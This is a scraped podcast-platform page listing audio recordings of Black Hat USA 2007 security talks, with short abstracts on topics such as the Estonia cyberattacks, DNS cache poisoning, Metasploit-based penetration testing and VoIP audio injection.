title

Black Hat Briefings, USA 2007 [Audio] Presentations from the security conference.

Jeff Moss

0
Followers
0
Plays
Black Hat Briefings, USA 2007 [Audio] Presentations from the security conference.
Black Hat Briefings, USA 2007 [Audio] Presentations from the security conference.

Black Hat Briefings, USA 2007 [Audio] Presentations from the security conference.

Jeff Moss

0
Followers
0
Plays
OVERVIEWEPISODESYOU MAY ALSO LIKE

Details

About Us

Past speeches and talks from the Black Hat Briefings computer security conferences.

The Black Hat Briefings USA 2007 was held August 1-3 in Las Vegas at Caesars Palace. Two days, sixteen tracks, over 95 presentations. Three keynote speakers: Richard Clarke, Tony Sager and Bruce Schneier.
A post convention wrap up can be found at http://www.blackhat.com/html/bh-usa-07/bh-usa-07-index.html

Black Hat Briefings bring together a unique mix in security: the best minds from government agencies and global corporations with the underground's most respected hackers. These forums take place regularly in Las Vegas, Washington D.C., Amsterdam, and Tokyo

Video, audio and supporting materials from past conferences will be posted here, starting with the newest and working our way back to the oldest with new content added as available! Past speeches and talks from Black Hat in an iPod friendly .mp4 h.264 192k video format. If you want to get a better idea of the presentation materials go to http://www.blackhat.com/html/bh-media-archives/bh-archives-2007.html and download them. Put up the pdfs in one window while watching the talks in the other. Almost as good as being there!

Latest Episodes

Gadi Evron: Estonia: Information Warfare and Strategic Lessons

In this talk we will discuss what is now referred to as "The 'first' Internet War" where Estonia was under massive online attacks for a period of three weeks, following tensions with the local Russian population. Following a riot in the streets of Tallinn, an online assault begun, resulting in a large-scale coordination of the Estonian defenses on both the local and International levels. We will demonstrate what in hind-sight worked for both the attackers and the defenders, as well as what failed. Following the chronological events and technical information, we will explore what impact these attacks had on Estonia's civil infrastructure and daily life, and how they impacted its economy during the attacks. Once we cover that ground, we will evaluate what we have so far discussed and elaborate on lessons learned while Gadi was in Estonia and from the post-mortem he wrote for the Estonian CERT. We will conclude our session by recognizing case studies on the strategic level, which can b...

73 MIN2007 DEC 12
Comments
Gadi Evron: Estonia: Information Warfare and Strategic Lessons

HD Moore & Valsmith: Tactical Exploitation-Part 2

Penetration testing often focuses on individual vulnerabilities and services. This talk introduces a tactical approach that does not rely on exploiting known vulnerabilities. Using combination of new tools and obscure techniques, I will walk through the process of compromising an organization without the use of normal exploit code. Many of the tools will be made available as new modules for the Metasploit Framework. REVIEWER NOTES: This is a monstrous presentation and will absolutely require the 150-minute time slot. For a smaller version of this presentation, please see my other submission (System Cracking with Metasploit 3). The goal of this presentation is to show some of the non-standard ways of breaking into networks, methods that are often ignored by professional pen-testing teams.

72 MIN2007 DEC 12
Comments
HD Moore & Valsmith: Tactical Exploitation-Part 2

Joe Stewart: Just Another Windows Kernel Perl Hacker

This talk will detail the Windows remote kernel debugging protocol and present a Perl framework for communicating with the kernel debug API over a serial/usb/1394 port from non-Windows systems. This leads to some interesting possibilities for hacking the kernel, such as code injection, hooking, forensics, sandboxing and more, all controlled from a separate non-windows machine.

18 MIN2006 JAN 10
Comments
Joe Stewart: Just Another Windows Kernel Perl Hacker

Jerry Schneider: Reflection DNS Poisoning

Targeting an enterprise attack at just a few employees seems to be yielding the best results, since it lowers the risk of discovering the exploit. Yet the typical DNS cache poisoning approach, aimed at various levels in the DNS server hierarchy or the enterprise server itself, is not as effective as it could be, primarily because so many people are affected that detection is rapid... There is one approach to DNS cache poisoning that can control the attack surface and is particularly effective when executed from within the enterprise. Rather than attempting to poison the enterprise DNS server or other external caches, the internal DNS cache within a Windows PC is targeted. Additionally, forensic analysis of the infected PC is hindered by the TimeToLive and volatility of these cache entries. I will demonstrate this type of attack using two machines on a local lan, and include some analysis of the firewall and configuration issues needed to defend against this type of exploit.

19 MIN2006 JAN 10
Comments
Jerry Schneider: Reflection DNS Poisoning

Stephan Patton: Social Network Site Data Mining

Social Network Sites contain a wealth of public information. This information is of great interest to researchers, investigators, and forensic experts. This presentation presents research regarding an approach to automated site access, and the implications of site structure. Associated tools and scripts will be explained. Additionally, investigative techniques with the recovered information will be covered.

23 MIN2006 JAN 10
Comments
Stephan Patton: Social Network Site Data Mining

Jeff Morin: Type Conversion Errors: How a Little Data Type Can Do a Whole Lot of Damage

In the realm of application testing, one of the major, but most often overlooked vulnerabilities, is that of type conversion errors. These errors result from input variable values being used throughout the many areas and codebases that make up the application, and in doing so, are potentially treated as different data types throughout the processing. The application functions correctly and without issue because the values of the input variable are anticipated, even though they are treated in different areas as different data types. The issue arises then when a value is input into one of these variables that is crafted in such a way as to be successfully manipulated by some data types, while failing others, resulting in the application behaving in unanticipated and potentially dangerous ways. These vulnerabilities are much more difficult to identify than simple error-based SQL injection or XSS as they don't readily display success or failure, rather can manifest themselves in other a...

10 MIN2006 JAN 10
Comments
Jeff Morin: Type Conversion Errors: How a Little Data Type Can Do a Whole Lot of Damage

Charlie Miller: Hacking Leopard: Tools and Techniques for Attacking the Newest Mac OS X

According to the Apple website, ?Mac OS X delivers the highest level of security through the adoption of industry standards, open software development and wise architectural decisions.? Of course, the Month of Apple Bugs showed that Mac?s are just as susceptible to vulnerabilities as other operating systems. Arguably, the two factors keeping the number of announced vulnerabilities on Mac OS X low is that not many researchers are interested in exploring this operating system due to low market share and not many researchers are familiar with the platform which can introduce a steep learning curve. The first of these reasons is going away as Apple?s market share continues to rise. This talk hopes to address the second reason. Namely, to provide researchers already familiar with Windows and Linux the knowledge and tools necessary to search for new security bugs in this operating system, specifically the new forthcoming release of ?Leopard?, the newest version of Mac OS X. Happily, there...

25 MIN2006 JAN 10
Comments
Charlie Miller: Hacking Leopard: Tools and Techniques for Attacking the Newest Mac OS X

Iain Mcdonald: Longhorn Server Foundation & Server Roles

Iain will discuss Server Foundation and Server Roles?how Longhorn Server applied the principles of attack surface minimization. This talk will detail the mechanics of LH Server componentization and then discuss the primary roles. You will learn how to install and manage a server that doesn't have a video driver and will hear about File Server, Web Server, Read Only Domain Controller, etc.

27 MIN2006 JAN 10
Comments
Iain Mcdonald: Longhorn Server Foundation & Server Roles

David Leblanc: Practical Sandboxing: Techniques for Isolating Processes

The sandbox created for the Microsoft Office Isolated Converter Environment will be demonstrated in detail. The combination of restricted tokens, job objects, and desktop changes needed to seriously isolate a process will be demonstrated, along with a demonstration of why each layer is needed.

23 MIN2006 JAN 10
Comments
David Leblanc: Practical Sandboxing: Techniques for Isolating Processes

Zane Lackey: Point, Click, RTPInject

The Realtime Transport Protocol (RTP) is a common media layer shared between H.323, SIP, and Skinny (SCCP) VoIP deployments. RTP is responsible for the actual voice/audio stream in VoIP networks; hence attacks against RTP are valid against the bulk VoIP installations in enterprise environments. Since signaling (H.323/SIP/SCCP) and media transfer (RTP) are handled by two separate protocols, injecting audio into a stream is often the most damaging attack against RTP. RTP is vulnerable to audio injection due to its lack of integrity protection and its wide tolerance of sequence information. The presentation will demonstrate an easy to use GUI VoIP injection attack tool for RTP appropriately named RTPInject. The tool, with zero setup prerequisites, allows an attacker to inject arbitrary audio into an existing conversation involving at least one VoIP endpoint. RTPInject automatically detects RTP streams on the wire, enumerates the codecs in use, and displays this information to the user....

14 MIN2006 JAN 10
Comments
Zane Lackey: Point, Click, RTPInject

Latest Episodes

Gadi Evron: Estonia: Information Warfare and Strategic Lessons

In this talk we will discuss what is now referred to as "The 'first' Internet War" where Estonia was under massive online attacks for a period of three weeks, following tensions with the local Russian population. Following a riot in the streets of Tallinn, an online assault begun, resulting in a large-scale coordination of the Estonian defenses on both the local and International levels. We will demonstrate what in hind-sight worked for both the attackers and the defenders, as well as what failed. Following the chronological events and technical information, we will explore what impact these attacks had on Estonia's civil infrastructure and daily life, and how they impacted its economy during the attacks. Once we cover that ground, we will evaluate what we have so far discussed and elaborate on lessons learned while Gadi was in Estonia and from the post-mortem he wrote for the Estonian CERT. We will conclude our session by recognizing case studies on the strategic level, which can b...

73 MIN2007 DEC 12
Comments
Gadi Evron: Estonia: Information Warfare and Strategic Lessons

HD Moore & Valsmith: Tactical Exploitation-Part 2

Penetration testing often focuses on individual vulnerabilities and services. This talk introduces a tactical approach that does not rely on exploiting known vulnerabilities. Using combination of new tools and obscure techniques, I will walk through the process of compromising an organization without the use of normal exploit code. Many of the tools will be made available as new modules for the Metasploit Framework. REVIEWER NOTES: This is a monstrous presentation and will absolutely require the 150-minute time slot. For a smaller version of this presentation, please see my other submission (System Cracking with Metasploit 3). The goal of this presentation is to show some of the non-standard ways of breaking into networks, methods that are often ignored by professional pen-testing teams.

72 MIN2007 DEC 12
Comments
HD Moore & Valsmith: Tactical Exploitation-Part 2

Joe Stewart: Just Another Windows Kernel Perl Hacker

This talk will detail the Windows remote kernel debugging protocol and present a Perl framework for communicating with the kernel debug API over a serial/usb/1394 port from non-Windows systems. This leads to some interesting possibilities for hacking the kernel, such as code injection, hooking, forensics, sandboxing and more, all controlled from a separate non-windows machine.

18 MIN2006 JAN 10
Comments
Joe Stewart: Just Another Windows Kernel Perl Hacker

Jerry Schneider: Reflection DNS Poisoning

Targeting an enterprise attack at just a few employees seems to be yielding the best results, since it lowers the risk of discovering the exploit. Yet the typical DNS cache poisoning approach, aimed at various levels in the DNS server hierarchy or the enterprise server itself, is not as effective as it could be, primarily because so many people are affected that detection is rapid... There is one approach to DNS cache poisoning that can control the attack surface and is particularly effective when executed from within the enterprise. Rather than attempting to poison the enterprise DNS server or other external caches, the internal DNS cache within a Windows PC is targeted. Additionally, forensic analysis of the infected PC is hindered by the TimeToLive and volatility of these cache entries. I will demonstrate this type of attack using two machines on a local lan, and include some analysis of the firewall and configuration issues needed to defend against this type of exploit.

19 MIN2006 JAN 10
Comments
Jerry Schneider: Reflection DNS Poisoning

Stephan Patton: Social Network Site Data Mining

Social Network Sites contain a wealth of public information. This information is of great interest to researchers, investigators, and forensic experts. This presentation presents research regarding an approach to automated site access, and the implications of site structure. Associated tools and scripts will be explained. Additionally, investigative techniques with the recovered information will be covered.

23 MIN2006 JAN 10
Comments
Stephan Patton: Social Network Site Data Mining

Jeff Morin: Type Conversion Errors: How a Little Data Type Can Do a Whole Lot of Damage

In the realm of application testing, one of the major, but most often overlooked vulnerabilities, is that of type conversion errors. These errors result from input variable values being used throughout the many areas and codebases that make up the application, and in doing so, are potentially treated as different data types throughout the processing. The application functions correctly and without issue because the values of the input variable are anticipated, even though they are treated in different areas as different data types. The issue arises then when a value is input into one of these variables that is crafted in such a way as to be successfully manipulated by some data types, while failing others, resulting in the application behaving in unanticipated and potentially dangerous ways. These vulnerabilities are much more difficult to identify than simple error-based SQL injection or XSS as they don't readily display success or failure, rather can manifest themselves in other a...

10 MIN2006 JAN 10
Comments
Jeff Morin: Type Conversion Errors: How a Little Data Type Can Do a Whole Lot of Damage

Charlie Miller: Hacking Leopard: Tools and Techniques for Attacking the Newest Mac OS X

According to the Apple website, ?Mac OS X delivers the highest level of security through the adoption of industry standards, open software development and wise architectural decisions.? Of course, the Month of Apple Bugs showed that Mac?s are just as susceptible to vulnerabilities as other operating systems. Arguably, the two factors keeping the number of announced vulnerabilities on Mac OS X low is that not many researchers are interested in exploring this operating system due to low market share and not many researchers are familiar with the platform which can introduce a steep learning curve. The first of these reasons is going away as Apple?s market share continues to rise. This talk hopes to address the second reason. Namely, to provide researchers already familiar with Windows and Linux the knowledge and tools necessary to search for new security bugs in this operating system, specifically the new forthcoming release of ?Leopard?, the newest version of Mac OS X. Happily, there...

25 MIN2006 JAN 10
Comments
Charlie Miller: Hacking Leopard: Tools and Techniques for Attacking the Newest Mac OS X

Iain Mcdonald: Longhorn Server Foundation & Server Roles

Iain will discuss Server Foundation and Server Roles?how Longhorn Server applied the principles of attack surface minimization. This talk will detail the mechanics of LH Server componentization and then discuss the primary roles. You will learn how to install and manage a server that doesn't have a video driver and will hear about File Server, Web Server, Read Only Domain Controller, etc.

27 MIN2006 JAN 10
Comments
Iain Mcdonald: Longhorn Server Foundation & Server Roles

David Leblanc: Practical Sandboxing: Techniques for Isolating Processes

The sandbox created for the Microsoft Office Isolated Converter Environment will be demonstrated in detail. The combination of restricted tokens, job objects, and desktop changes needed to seriously isolate a process will be demonstrated, along with a demonstration of why each layer is needed.

23 MIN2006 JAN 10
Comments
David Leblanc: Practical Sandboxing: Techniques for Isolating Processes

Zane Lackey: Point, Click, RTPInject

The Realtime Transport Protocol (RTP) is a common media layer shared between H.323, SIP, and Skinny (SCCP) VoIP deployments. RTP is responsible for the actual voice/audio stream in VoIP networks; hence attacks against RTP are valid against the bulk VoIP installations in enterprise environments. Since signaling (H.323/SIP/SCCP) and media transfer (RTP) are handled by two separate protocols, injecting audio into a stream is often the most damaging attack against RTP. RTP is vulnerable to audio injection due to its lack of integrity protection and its wide tolerance of sequence information. The presentation will demonstrate an easy to use GUI VoIP injection attack tool for RTP appropriately named RTPInject. The tool, with zero setup prerequisites, allows an attacker to inject arbitrary audio into an existing conversation involving at least one VoIP endpoint. RTPInject automatically detects RTP streams on the wire, enumerates the codecs in use, and displays this information to the user....

14 MIN2006 JAN 10
Comments
Zane Lackey: Point, Click, RTPInject
hmly
himalayaプレミアムへようこそ聴き放題のオーディオブックをお楽しみください。